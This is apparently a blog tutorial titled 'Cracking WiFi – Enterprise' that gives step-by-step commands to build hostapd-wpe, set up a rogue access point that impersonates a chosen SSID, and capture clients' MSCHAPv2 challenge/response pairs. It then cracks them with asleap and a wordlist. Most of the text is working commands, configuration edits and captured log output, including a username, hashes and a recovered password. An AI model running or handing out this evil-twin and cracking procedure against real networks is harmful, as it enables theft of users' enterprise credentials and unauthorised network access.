Cracking WiFi – Enterprise

WifiUsing hostapd-wpe which implements an IEEE 802.1x Authenticator and Authentication Server for impersonation attacks to obtain client credentials, establish connectivity to the client, and launch other attacks where applicable.

Installation is relatively simple, but might encounter some hiccups in Ubuntu/Debian/Kali. To aid in getting you up and running, I’ve created the following guide.

Installation

Load Dependancies:
apt-get install libssl-dev libnl-dev

Install and patch hostapd by doing the following:
git clone https://github.com/OpenSecurityResearch/hostapd-wpe
wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz
tar -zxf hostapd-2.2.tar.gz
cd hostapd-2.2
patch -p1 < ../hostapd-wpe/hostapd-wpe.patch

Stage and perform configuration steps:
cd hostapd
make
cd ../../hostapd-wpe/certs
./bootstrap
cd ../../hostapd-2.2/hostapd
vi hostapd-wpe.conf

Change the following:
interface=eth0 to interface=wlan0 (or the interface of choosing)
change driver=wired to #driver=wired
uncomment all 802.11 options and define the SSID you wish to “man-in-the-middle”

Run the following to eliminate errors on start:
sudo nmcli nm wifi off
sudo rfkill unblock wlan
sudo ifconfig wlan0 10.15.0.1/24 up
sleep 1

Run the application by doing the following:
sudo ./hostapd-wpe hostapd-wpe.conf

As clients connect, you will see something similar to the following in hostapd-wpe.log:
root@shapeshifter:/opt/hostapd-2.2/hostapd# tail -f hostapd-wpe.log
challenge: d1:a3:22:c0:ba:e3:9d:94
response: c3:fb:98:0c:c9:f0:5b:56:1f:a8:dd:ce:3e:be:cc:36:b1:28:29:61:c3:cd:52:1f
jtr NETNTLM: pkelley:$NETNTLM$d1a322c0bae39d94$c3fb980cc9f05b561fa8ddce3ebecc36b1282961c3cd521f
mschapv2: Wed Mar 11 11:19:50 2015
username: pkelley
challenge: 91:f4:22:b5:24:14:15:56
response: 71:e9:f0:35:96:68:b7:56:ec:ab:b5:7e:da:5b:c4:ef:6f:49:21:d1:35:39:06:48
jtr NETNTLM: pkelley:$NETNTLM$91f422b524141556$71e9f0359668b756ecabb57eda5bc4ef6f4921d135390648

Use asleap to crack this passwords, using word lists:
format = asleap -C (challenge) -R (response) -W (wordlist)

Example:
asleap -C 91:f4:22:b5:24:14:15:56 -R 71:e9:f0:35:96:68:b7:56:ec:ab:b5:7e:da:5b:c4:ef:6f:49:21:d1:35:39:06:48 -W /opt/SecLists/Passwords/rockyou.txt

Output:
asleap 2.2 – actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using wordlist mode with “/opt/SecLists/Passwords/rockyou.txt”.
hash bytes: d86c
NT hash: 8c3efc486704d2ee71eebe71af14d86c
password: Password1234

Leave a Reply

Your email address will not be published. Required fields are marked *